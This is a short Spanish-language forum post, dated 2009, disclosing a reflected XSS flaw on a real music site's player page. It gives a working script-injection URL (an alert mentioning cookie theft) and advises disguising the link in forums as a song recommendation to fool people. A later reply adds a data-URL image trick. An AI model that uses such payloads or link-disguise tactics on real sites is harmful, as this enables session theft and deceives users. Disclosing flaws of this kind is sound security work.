Autor
Esta reportado 11/08/2009
El xss esta en la pagina donde se abre el reproductor portable...
Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD
por ejemplo tenemos una cancion cualquiera:
http://www.goear.com/listenwin.php?v=78707c5
le agregamos nuestro codigo malo xD
http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias
')</script>Que en el navegador se vera:
http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E
y que podemos disfrazar en foros asi
http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"
No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin
Saludos.
PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬
En línea
complemente la informacion en el post de SDC que no recordaba xD
![WWW](data:text/html,<img src="http://img199.imageshack.us/img199/7002/norris.gif" />;http://)
Lo malo es que el Select te lo jode 
